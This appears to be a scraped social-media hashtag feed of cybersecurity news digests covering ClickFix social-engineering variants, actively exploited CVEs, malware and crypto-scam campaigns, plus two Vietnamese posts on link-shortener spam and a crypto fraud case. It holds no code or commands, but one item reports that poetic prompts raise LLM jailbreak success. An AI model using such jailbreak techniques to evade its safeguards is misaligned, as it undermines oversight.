Fake Google Gemini chatbot used to sell non-existent “Google Coin.”
AI-driven sales script + fake presale dashboard → BTC/ETH payments.
Analysis by Malwarebytes.
https://www.technadu.com/malicious-gemini-ai-chatbot-sells-fake-google-coin-in-scam-campaign/620496/
It's been a busy 24 hours in the cyber world with significant updates on the evolving "ClickFix" social engineering tactic, showing how attackers are getting creative with initial access and payload delivery. Let's take a look:
Evolving ClickFix Attacks: DNS Staging and Crypto Hijacks ⚠️
- Microsoft has detailed a new DNS-based ClickFix variant where victims are tricked into running `nslookup` commands, using DNS as a stealthy staging channel for payloads like ModeloRAT. This method blends malicious activity into normal network traffic, making detection harder.
- A separate, novel ClickFix campaign is leveraging Pastebin comments and Google Docs to socially engineer cryptocurrency users into executing malicious JavaScript directly in their browser. This allows attackers to hijack Bitcoin swap transactions and redirect funds to their wallets.
- These incidents highlight the evolving nature of ClickFix, moving beyond traditional OS-level command execution to sophisticated DNS staging and direct browser manipulation for financial theft, underscoring the critical need for user awareness and robust detection of procedural trust abuse.
📰 The Hacker News | https://thehackernews.com/2026/02/microsoft-discloses-dns-based-clickfix.html
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/pastebin-comments-push-clickfix-javascript-attack-to-hijack-crypto-swaps/
#CyberSecurity #ThreatIntelligence #SocialEngineering #ClickFix #Malware #ModeloRAT #LummaStealer #CryptoScam #InfoSec #CyberAttack #IncidentResponse
The cavalry is not coming. #cryptoscam #Pigslaughteringscams
Xây tool rút gọn link tưởng vui, hoá ra dành 90% thời gian để đấu spammer! Sau hàng trăm commit, tôi học được: kiểm duyệt phải làm NGAY từ ngày đầu. Monitor traffic, kiểm tra kỹ nội dung, hạn chế free tier, shadowban, blacklist domain độc hại, giới hạn tần suất, xác minh email & log fingerprint thay IP. Spammer không ngủ, hoá đơn tiền server cũng không! #SaaS #Spam #URLshortener #LessionLearned #AntiSpam #Phishing #CryptoScam #KhởiNghiệp #AnNinhMạng #XửLýSpam
Khởi tố vụ lừa đảo tiền điện tử, chiếm đoạt hơn 7,4 tỷ đồng tại TP.HCM. Các nghi phạm giả danh chuyên gia tài chính, dụ nạn nhân đầu tư vào sàn giao dịch ảo. Vụ việc cũng phanh phui đường dây tổ chức vượt biên trái phép sang Campuchia. #CryptoScam #LuanDaoTienSo #Campuchia #ToiPhamMang #Cybercrime #FinancialFraud #VuAnHinhSu
Alright team, it's been a pretty packed start to the year in cyber! We've got some interesting developments on active exploitation, new malware campaigns, and a couple of big names facing regulatory heat. Let's dive in:
Recent Cyber Attacks ⚠️
- Unleash Protocol, a decentralised IP platform, lost approximately $3.9 million in crypto due to an unauthorised smart contract upgrade, initiated by an external address gaining administrative control via multisig governance.
- A Lithuanian national was extradited to South Korea for infecting 2.8 million systems globally with clipboard-stealing malware, disguised as the KMSAuto Windows/Office activator, siphoning around $1.2 million in virtual assets.
- Amazon successfully blocked over 1,800 suspected North Korean operatives from infiltrating its workforce since April 2024, who were posing as IT workers or recruiters to steal credentials and source code, as DPRK crypto theft surged to $2 billion in 2025.
📰 The Hacker News | https://thehackernews.com/2026/01/threatsday-bulletin-ghostad-drain-macos.html
Actively Exploited Vulnerabilities 🛡️
- The RondoDox botnet has been actively exploiting the critical React2Shell (CVE-2025-55182, CVSS 10.0) RCE flaw in React Server Components and Next.js since December 2025, targeting IoT devices and web servers to deploy crypto miners and Mirai botnet variants.
- A coordinated campaign, primarily from Japan-based infrastructure, systematically exploited over 10 Adobe ColdFusion CVEs from 2023-2024 during Christmas 2025, leading to direct code execution, credential harvesting, and JNDI lookups.
- Researchers identified a 4-second window where AWS IAM eventual consistency allows attackers to leverage deleted access keys to create new ones, achieving persistence even after defenders believe credentials are revoked.
📰 The Hacker News | https://thehackernews.com/2026/01/rondodox-botnet-exploits-critical.html
📰 The Hacker News | https://thehackernews.com/2026/01/threatsday-bulletin-ghostad-drain-macos.html
New Threat Research & Malware Campaigns 🚨
- The GlassWorm supply chain campaign has resurfaced, now targeting macOS users with malicious Open VSX extensions (50,000 downloads) to steal funds from over 50 browser extension wallets, iCloud Keychain data, and developer credentials.
- OceanLotus (APT) is targeting China's Xinchuang initiative, exploiting CVE-2023-52076 (RCE in Atril document viewer) and deploying custom ELF Trojans specifically designed to bypass traditional Linux system checks on indigenous innovation platforms.
- The IPCola proxy network, offering 1.6 million IPs, is powered by the GaGaNode decentralised bandwidth monetization service, whose SDK contains a critical RCE vulnerability, enabling broad compromise of IoT, desktop, and mobile devices.
- Large-scale mobile adware campaigns, GhostAd (Android) and SkyWalk (iOS), are draining device resources and defrauding advertisers by running persistent background ad engines and serving invisible ads, respectively.
- Magecart attacks are evolving into full identity compromise, hijacking checkout and account creation flows with fake payment forms, phishing iframes, and anti-forensics techniques to steal credentials and personal information.
- A new cybercrime tool, ErrTraffic, automates "ClickFix" attacks by generating fake browser glitches on compromised websites, tricking users into installing information stealers or Android banking trojans.
- Kaspersky discovered 'Keenadu', a pre-installed backdoor in libandroid_runtime.so on certain Android tablet models, providing remote access for data exfiltration and command execution.
📰 The Hacker News | https://thehackernews.com/2026/01/threatsday-bulletin-ghostad-drain-macos.html
Threat Landscape & AI Concerns 🧠
- Reddit banned the r/ChatGPTJailbreak subreddit (229,000 users) for violating rules, highlighting ongoing challenges with LLM safety filters, prompt injections, and the potential for generating non-consensual deepfakes; poetic prompts were found to increase attack success rates fivefold.
- Research details "hacktivist proxy operations" where ideologically aligned non-state cyber groups conduct disruptive activities (DDoS, defacement) that align with state geopolitical interests, providing plausible deniability for the benefiting state.
📰 The Hacker News | https://thehackernews.com/2026/01/threatsday-bulletin-ghostad-drain-macos.html
Regulatory & Corporate Accountability ⚖️
- Reuters reported that Meta developed a "playbook" to mislead regulators about the prevalence of scam ads on its platform, by systematically deleting fraudulent ads from its Ad Library during regulatory searches.
- Disney agreed to pay a $10 million civil penalty to settle FTC allegations of violating children's privacy laws (COPPA) by misdesignating YouTube content, leading to unlawful data collection and targeted advertising without parental consent.
📰 The Hacker News | https://thehackernews.com/2026/01/threatsday-bulletin-ghostad-drain-macos.html
#CyberSecurity #ThreatIntelligence #Vulnerabilities #RCE #Botnet #Malware #APT #SupplyChain #Adware #AdFraud #CryptoScam #NationState #DPRK #AI #LLM #DataPrivacy #COPPA #RegulatoryCompliance #InfoSec #IncidentResponse
Kirsty
TechNadu
SOC Goulash
BjoernAusGE
Sudo Sudo Sudo ⒶⒺⓋ
Reddit Tech VN Bot
LostSettler